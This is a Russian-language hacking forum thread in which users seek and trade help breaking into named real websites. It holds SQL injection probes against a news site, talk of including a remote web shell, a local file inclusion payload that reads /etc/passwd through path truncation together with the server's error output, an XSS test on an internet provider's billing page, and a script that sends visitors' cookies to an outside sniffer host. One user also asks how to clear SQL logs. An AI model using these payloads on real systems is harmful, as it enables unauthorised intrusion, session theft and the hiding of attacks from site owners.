Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Serge24

    Serge24 Banned

    Joined:
    6 May 2009
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Спасибо, получилось :)

    И Это тоже :)

    PS: Как sql лог почистить? :)
     
    #6941 Serge24, 7 May 2009
    Last edited: 7 May 2009
  2. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    http://en.isranews.com/index.php?option=com_content&view=category&layout=blog&id=1+AND+1=1/*

    http://en.isranews.com/index.php?option=com_content&view=category&layout=blog&id=1+AND+1=2/*

    Скуля ведь? Как раскрутить? Не получается даже узнать версию с помощью подзапросов.
     
  3. AET

    AET New Member

    Joined:
    17 Mar 2008
    Messages:
    23
    Likes Received:
    1
    Reputations:
    -2
    про инклудов прочитал но во многих саитах его зашишают а можно ди с помащю инклуда и налажением шели от другого саита создать папку
     
  4. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    http://en.isranews.com/index.php?option=com_content&view=category&layout=blog&id=3-2
     
    #6944 R1dex, 7 May 2009
    Last edited: 7 May 2009
  5. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Мы тут посовещались с коллегами на ИРЦ
    (они все как один хакеры) и поняли, что нам ровным счётом ничего не известно про способ "налажением шели от другого саита ".

    Не мог-бы ты яснее сформулировать вопрос?
     
    2 people like this.
  6. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Он наверное имеет в виду удалённый инклуд.
     
  7. [х26]VОLАND

    [х26]VОLАND Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    513
    Likes Received:
    756
    Reputations:
    218
    Теперь это так называется?
    Спасибо, теперь будем знать!.
     
  8. AET

    AET New Member

    Joined:
    17 Mar 2008
    Messages:
    23
    Likes Received:
    1
    Reputations:
    -2
    тоесть инклудовать свой шелл, на другую страницу
     
    1 person likes this.
  9. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    AET, напиши по РУССКИ, что ты хочешь???
    Залить шелл на свой хост, затем с помощью удалённого инклуда его подключить на бажный сайт и создать папку??
     
    #6949 -m0rgan-, 7 May 2009
    Last edited: 7 May 2009
  10. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    А, "инклудовать"?! Это совсем другое дело.

    Думаю если у Вас существует возможность "инклудовать свой шелл" , а так-же "на запись в папку правать", то создать папку, либо файл, вполне возможно. Прям из "инклудоваемого" шелла.

    Единственное, что опять повергает меня в сомнения это фраза "на другую страницу". Дело в том, что этот момент я так и не смог понять, поэтому ответ возможно не полон.

    PS Простите за грамматику, не вполне ещё освоился с Вашим диалектом
     
    1 person likes this.
  11. AET

    AET New Member

    Joined:
    17 Mar 2008
    Messages:
    23
    Likes Received:
    1
    Reputations:
    -2
    -m0rgan- да я так и хотел сделать

    jokester вы меня поняли блогодарен
     
    #6951 AET, 7 May 2009
    Last edited: 7 May 2009
  12. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    R1dex
    Я не совсем понял, можно ли поподробнее?
     
  13. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    хочу получить доступ к базе!!! Возможно?

    Как я понял прочитав много инфы о инклуде это локальный инклуд! И с помощью его можно только просматривать файлы с нуливым байтом %00!

    Но к сожелению у меня и это не проканало! :confused:


    И еже вопрос:
    Можно ли error include использовать для XSS атаки?
     
    #6953 geforce, 7 May 2009
    Last edited: 7 May 2009
    1 person likes this.
  14. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    нулл байт скорее всего не проходит по той причине, что magic_quotes_gpc ON, ибо происходит слеширование:
    Code:
    Warning: include(./inc/../../../etc/passwd[color="red"]\[/color]0.php) 
    
     
  15. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5

    Это означает что это безполезная инклуда???
     
  16. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    2geforce
    попробуй аналог нуллбайту
    raz0r.name/articles/null-byte-alternative/
     
    2 people like this.
  17. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    Onyma Biling

    Есть ссылка на инет провайдера!
    https://stat.tvingo.ru/

    при вписывании в окно Регистрационное имя
    xss код '<script>alert(123)</script>

    Этим можно как нибудь воспользоваться???
     
  18. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    http://forum.antichat.ru/thread20140.html
     
  19. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    2geforce
    Ты можешь составить запрос:
    Code:
    '><script>img = new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;</script>
    (c)Micr0b
    Для перенаправления куков на сниффер.
     
  20. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Code:
    http://wow.alania.net/?page=../../etc/passwd%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C
    Расширение срезалось:

    Code:
    Warning: include(./inc/../../etc/passwd<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<&l in Y:\home\78.110.144.12\www\index.php on line 104
     
    #6960 -m0rgan-, 7 May 2009
    Last edited: 7 May 2009
Thread Status:
Not open for further replies.